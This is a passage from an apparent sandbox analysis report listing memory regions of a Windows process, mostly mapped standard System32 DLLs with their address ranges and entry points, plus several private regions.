0x7fef9b21414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2157 start_va = 0x7fef9b60000 end_va = 0x7fef9b76fff monitored = 0 entry_point = 0x7fef9b61060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2158 start_va = 0x7fef9b80000 end_va = 0x7fef9d2ffff monitored = 0 entry_point = 0x7fef9b81010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2159 start_va = 0x7fef9d30000 end_va = 0x7fef9da6fff monitored = 0 entry_point = 0x7fef9d6e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2160 start_va = 0x7fef9dd0000 end_va = 0x7fef9e09fff monitored = 0 entry_point = 0x7fef9ded020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2161 start_va = 0x7fefa580000 end_va = 0x7fefa5f6fff monitored = 0 entry_point = 0x7fefa58afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2162 start_va = 0x7fefa600000 end_va = 0x7fefa60efff monitored = 0 entry_point = 0x7fefa607e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 2163 start_va = 0x7fefa6a0000 end_va = 0x7fefa6a9fff monitored = 0 entry_point = 0x7fefa6a260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2164 start_va = 0x7fefa6b0000 end_va = 0x7fefa7c1fff monitored = 0 entry_point = 0x7fefa6cf354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2165 start_va = 0x7fefa7d0000 end_va = 0x7fefa7d8fff monitored = 0 entry_point = 0x7fefa7d3668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2166 start_va = 0x7fefa7e0000 end_va = 0x7fefa7e8fff monitored = 0 entry_point = 0x7fefa7e1020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2167 start_va = 0x7fefa7f0000 end_va = 0x7fefa845fff monitored = 0 entry_point = 0x7fefa7f1040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2168 start_va = 0x7fefa850000 end_va = 0x7fefa867fff monitored = 0 entry_point = 0x7fefa851bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2169 start_va = 0x7fefa870000 end_va = 0x7fefa889fff monitored = 0 entry_point = 0x7fefa883fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2170 start_va = 0x7fefa890000 end_va = 0x7fefa8edfff monitored = 0 entry_point = 0x7fefa899024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2171 start_va = 0x7fefa8f0000 end_va = 0x7fefa900fff monitored = 0 entry_point = 0x7fefa8f16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2172 start_va = 0x7fefa920000 end_va = 0x7fefa972fff monitored = 0 entry_point = 0x7fefa922b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2173 start_va = 0x7fefa9b0000 end_va = 0x7fefaa09fff monitored = 0 entry_point = 0x7fefa9edde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2174 start_va = 0x7fefaa10000 end_va = 0x7fefaa30fff monitored = 0 entry_point = 0x7fefaa203b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2175 start_va = 0x7fefab30000 end_va = 0x7fefab3afff monitored = 0 entry_point = 0x7fefab31198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2176 start_va = 0x7fefab40000 end_va = 0x7fefab53fff monitored = 0 entry_point = 0x7fefab43e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2177 start_va = 0x7fefab60000 end_va = 0x7fefab86fff monitored = 0 entry_point = 0x7fefab698bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2178 start_va = 0x7fefab90000 end_va = 0x7fefabf6fff monitored = 0 entry_point = 0x7fefaba6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2179 start_va = 0x7fefac10000 end_va = 0x7fefac1afff monitored = 0 entry_point = 0x7fefac14f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2180 start_va = 0x7fefac20000 end_va = 0x7fefac2bfff monitored = 0 entry_point = 0x7fefac215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2181 start_va = 0x7fefac70000 end_va = 0x7fefac7ffff monitored = 0 entry_point = 0x7fefac7835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2182 start_va = 0x7fefac80000 end_va = 0x7fefac98fff monitored = 0 entry_point = 0x7fefac811a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2183 start_va = 0x7fefaca0000 end_va = 0x7fefacd6fff monitored = 0 entry_point = 0x7fefaca8424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2184 start_va = 0x7fefae40000 end_va = 0x7fefae54fff monitored = 0 entry_point = 0x7fefae460d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2185 start_va = 0x7fefae60000 end_va = 0x7fefaf21fff monitored = 0 entry_point = 0x7fefae6101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2186 start_va = 0x7fefafe0000 end_va = 0x7fefaff0fff monitored = 0 entry_point = 0x7fefafe14c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2187 start_va = 0x7fefb130000 end_va = 0x7fefb143fff monitored = 0 entry_point = 0x7fefb1316b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2188 start_va = 0x7fefb150000 end_va = 0x7fefb164fff monitored = 0 entry_point = 0x7fefb151050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2189 start_va = 0x7fefb170000 end_va = 0x7fefb17bfff monitored = 0 entry_point = 0x7fefb1718a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2190 start_va = 0x7fefb180000 end_va = 0x7fefb195fff monitored = 0 entry_point = 0x7fefb1811a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2191 start_va = 0x7fefb210000 end_va = 0x7fefb21bfff monitored = 0 entry_point = 0x7fefb21602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2192 start_va = 0x7fefb2b0000 end_va = 0x7fefb2c0fff monitored = 0 entry_point = 0x7fefb2b1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2193 start_va = 0x7fefb410000 end_va = 0x7fefb42cfff monitored = 0 entry_point = 0x7fefb412f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 2194 start_va = 0x7fefb430000 end_va = 0x7fefb438fff monitored = 0 entry_point = 0x7fefb431010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2195 start_va = 0x7fefb470000 end_va = 0x7fefb4a4fff monitored = 0 entry_point = 0x7fefb471064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2196 start_va = 0x7fefb990000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb99bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2197 start_va = 0x7fefb9f0000 end_va = 0x7fefbb1bfff monitored = 0 entry_point = 0x7fefb9f94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2198 start_va = 0x7fefbb20000 end_va = 0x7fefbb3cfff monitored = 0 entry_point = 0x7fefbb21ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2199 start_va = 0x7fefbb70000 end_va = 0x7fefbb9cfff monitored = 0 entry_point = 0x7fefbb71010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2200 start_va = 0x7fefbba0000 end_va = 0x7fefbd93fff monitored = 0 entry_point = 0x7fefbd2c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2201 start_va = 0x7fefc230000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc231064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2202 start_va = 0x7fefc240000 end_va = 0x7fefc2fafff monitored = 0 entry_point = 0x7fefc246de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2203 start_va = 0x7fefc300000 end_va = 0x7fefc306fff monitored = 0 entry_point = 0x7fefc3014b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2204 start_va = 0x7fefc3c0000 end_va = 0x7fefc3ccfff monitored = 0 entry_point = 0x7fefc3c1348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2205 start_va = 0x7fefc400000 end_va = 0x7fefc41afff monitored = 0 entry_point = 0x7fefc402068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2206 start_va = 0x7fefc420000 end_va = 0x7fefc43dfff monitored = 0 entry_point = 0x7fefc4213b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2207 start_va = 0x7fefc440000 end_va = 0x7fefc451fff monitored = 0 entry_point = 0x7fefc441060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2208 start_va = 0x7fefc4f0000 end_va = 0x7fefc528fff monitored = 0 entry_point = 0x7fefc4fc0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2209 start_va = 0x7fefc530000 end_va = 0x7fefc539fff monitored = 0 entry_point = 0x7fefc533cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2210 start_va = 0x7fefc660000 end_va = 0x7fefc6a6fff monitored = 0 entry_point = 0x7fefc661064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2211 start_va = 0x7fefc750000 end_va = 0x7fefc77ffff monitored = 0 entry_point = 0x7fefc75194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2212 start_va = 0x7fefc780000 end_va = 0x7fefc7dafff monitored = 0 entry_point = 0x7fefc786940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2213 start_va = 0x7fefc8f0000 end_va = 0x7fefc8f6fff monitored = 0 entry_point = 0x7fefc8f142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2214 start_va = 0x7fefc900000 end_va = 0x7fefc954fff monitored = 0 entry_point = 0x7fefc901054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2215 start_va = 0x7fefc960000 end_va = 0x7fefc977fff monitored = 0 entry_point = 0x7fefc963b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2216 start_va = 0x7fefca70000 end_va = 0x7fefcaa1fff monitored = 0 entry_point = 0x7fefca7144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2217 start_va = 0x7fefcab0000 end_va = 0x7fefcad1fff monitored = 0 entry_point = 0x7fefcab5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2218 start_va = 0x7fefcb30000 end_va = 0x7fefcb5efff monitored = 0 entry_point = 0x7fefcb31064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2219 start_va = 0x7fefcb70000 end_va = 0x7fefcb92fff monitored = 0 entry_point = 0x7fefcb71198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2220 start_va = 0x7fefcba0000 end_va = 0x7fefcc0cfff monitored = 0 entry_point = 0x7fefcba1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2221 start_va = 0x7fefcc10000 end_va = 0x7fefcc23fff monitored = 0 entry_point = 0x7fefcc14160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2222 start_va = 0x7fefcd70000 end_va = 0x7fefcd7afff monitored = 0 entry_point = 0x7fefcd71030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2223 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2224 start_va = 0x7fefcf30000 end_va = 0x7fefcf54fff monitored = 0 entry_point = 0x7fefcf39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2225 start_va = 0x7fefcf60000 end_va = 0x7fefcf6efff monitored = 0 entry_point = 0x7fefcf61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2226 start_va = 0x7fefcf70000 end_va = 0x7fefd000fff monitored = 0 entry_point = 0x7fefcf71440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2227 start_va = 0x7fefd010000 end_va = 0x7fefd023fff monitored = 0 entry_point = 0x7fefd0110e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2228 start_va = 0x7fefd030000 end_va = 0x7fefd06cfff monitored = 0 entry_point = 0x7fefd0318f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2229 start_va = 0x7fefd070000 end_va = 0x7fefd07efff monitored = 0 entry_point = 0x7fefd0719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2230 start_va = 0x7fefd110000 end_va = 0x7fefd11efff monitored = 0 entry_point = 0x7fefd111020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2231 start_va = 0x7fefd120000 end_va = 0x7fefd139fff monitored = 0 entry_point = 0x7fefd121558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2232 start_va = 0x7fefd140000 end_va = 0x7fefd175fff monitored = 0 entry_point = 0x7fefd141474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2233 start_va = 0x7fefd220000 end_va = 0x7fefd25afff monitored = 0 entry_point = 0x7fefd221324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2234 start_va = 0x7fefd260000 end_va = 0x7fefd3ccfff monitored = 0 entry_point = 0x7fefd2610b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2235 start_va = 0x7fefd3d0000 end_va = 0x7fefd43bfff monitored = 0 entry_point = 0x7fefd3d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2236 start_va = 0x7fefd440000 end_va = 0x7fefd45efff monitored = 0 entry_point = 0x7fefd4460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2237 start_va = 0x7fefd460000 end_va = 0x7fefd53afff monitored = 0 entry_point = 0x7fefd480760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2238 start_va = 0x7fefd540000 end_va = 0x7fefd5a6fff monitored = 0 entry_point = 0x7fefd54b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2239 start_va = 0x7fefd5b0000 end_va = 0x7fefd648fff monitored = 0 entry_point = 0x7fefd5b1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2240 start_va = 0x7fefd650000 end_va = 0x7fefd852fff monitored = 0 entry_point = 0x7fefd673330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2241 start_va = 0x7fefdb40000 end_va = 0x7fefdb6dfff monitored = 0 entry_point = 0x7fefdb41010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2242 start_va = 0x7fefdb90000 end_va = 0x7fefdb97fff monitored = 0 entry_point = 0x7fefdb91504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2243 start_va = 0x7fefdba0000 end_va = 0x7fefdbadfff monitored = 0 entry_point = 0x7fefdba1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2244 start_va = 0x7fefdbb0000 end_va = 0x7fefdcb8fff monitored = 0 entry_point = 0x7fefdbb1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2245 start_va = 0x7fefdcc0000 end_va = 0x7fefdd30fff monitored = 0 entry_point = 0x7fefdcd1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2246 start_va = 0x7fefdd40000 end_va = 0x7fefdddefff monitored = 0 entry_point = 0x7fefdd425a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2247 start_va = 0x7fefdde0000 end_va = 0x7fefeb67fff monitored = 0 entry_point = 0x7fefde5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2248 start_va = 0x7fefeb70000 end_va = 0x7fefebbcfff monitored = 0 entry_point = 0x7fefeb71070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2249 start_va = 0x7fefebc0000 end_va = 0x7fefec96fff monitored = 0 entry_point = 0x7fefebc3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2250 start_va = 0x7fefeca0000 end_va = 0x7fefed68fff monitored = 0 entry_point = 0x7fefed1a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2251 start_va = 0x7fefed70000 end_va = 0x7fefee9cfff monitored = 0 entry_point = 0x7fefedbed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2252 start_va = 0x7fefef40000 end_va = 0x7fefef91fff monitored = 0 entry_point = 0x7fefef410d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2253 start_va = 0x7feff250000 end_va = 0x7feff426fff monitored = 0 entry_point = 0x7feff251010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2254 start_va = 0x7feff440000 end_va = 0x7feff440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2255 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 2256 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 2257 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 2258 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 2259 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 2260 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 2261 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 2262 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 2263 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 2264 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 2265 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 2266 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 2267 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 2268 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 2269 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 2270 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 2271 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2272 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 2273 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2274 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2275 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2276 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 2277 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2278 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = 